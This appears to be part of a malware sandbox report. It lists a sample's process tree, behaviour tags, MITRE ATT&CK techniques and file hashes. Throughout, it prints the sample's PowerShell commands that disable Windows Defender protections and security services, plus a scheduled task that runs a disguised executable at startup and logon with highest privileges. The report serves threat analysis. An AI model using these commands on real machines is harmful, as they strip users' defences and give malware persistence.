C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' -Name Start -Value 4 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wscsvc' -Name Start -Value 4 -PropertyType DWORD -Force"4⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableOnAccessProtection -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableScanOnRealtimeEnable -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $True4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disabled4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMnitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -UILockdown $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' -Name Start -Value 4 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wscsvc' -Name Start -Value 4 -PropertyType DWORD -Force"4⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableOnAccessProtection -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableScanOnRealtimeEnable -Value 1 -PropertyType DWORD -Force"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $True4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell.exe "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';" >nul2⤵PID:1724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
208KB
MD5a58599f667d687f6eb51bb528a6bb528
SHA10991f92dc45d82227775f9968d91dcbe703d03a2
SHA256b93b33fff6d41f5c0388ec4a1e424db2a304582e998596810f47b9b823ef2807
SHA5122dd48e6042a65c0d7f1af17676ef3cc35dbdf5978c68ca00a1b6e228146bec306411e38e4bbffaf0de172dd7cbdd2993e9cb5c645d4251d420acb0501d39d0b1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57d8e619d3274bfe2726aa61e1e22b904
SHA133d3efd6333f0999a141a35c419a94b99b18eb91
SHA256023bcc0e267bdd7148758f7eb15b32002beaae1d19e2a6a666679b214317dcea
SHA512726beca385b989a754beabe0c84ed7d2f5df1e4a783da83424db99b6daf73659e91d1e07286d88e90e1cdf8d9a6bddcbfcb60a46a9e748cfec778319e21f1e03
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD58dff18646bd564e8ca6c671b5876cc30
SHA17fd2c63047ab11eb177a49412d134957cc9aa8ae
SHA25652494bf2f8f222ad90c89683db0d9f8d6bfddc349d44bfb7dc0c4d9ad253084e
SHA51261c4428293ce0f85cefd640e535ca55b1ab41a44dd7c5e0df294b805308841ec28fa2d1cc0205d37f020d53b9d318be098d4042a77d6cfabd2fcdb558b7f21fe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD506c17315717ec95bd609351e3b0de88e
SHA1d4c5cb2d0887fa75b85893b5aba1ce82de071eb8
SHA2569dcb3313a6132a0ad6737915ebfee89cac3faa12be942b8714c78f6d65146b95
SHA5123f75812c71264c1248f484812206950001398c15cb278493106da83971edc9a09ea106488ab892cc2f4f56665a636fec5306c32b97726062a4035da2ef5e2eb6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
768KB
MD5377fc74b249bfc1be3258a6facd9327a
SHA142620e2f8dc6d890d312f81a2337ae40b7a6a73b
SHA256df016016c94d7ad3f689b994f54f3070a91f2054e808a005a398875164cf7ec1
SHA512f075185ca9e2a7fbd801b3aca33e29790630912edbb727d419e039c50a7af3c7578f77ec5e7e607a22291efde54014538b7a321143b95045695d571463a9fa45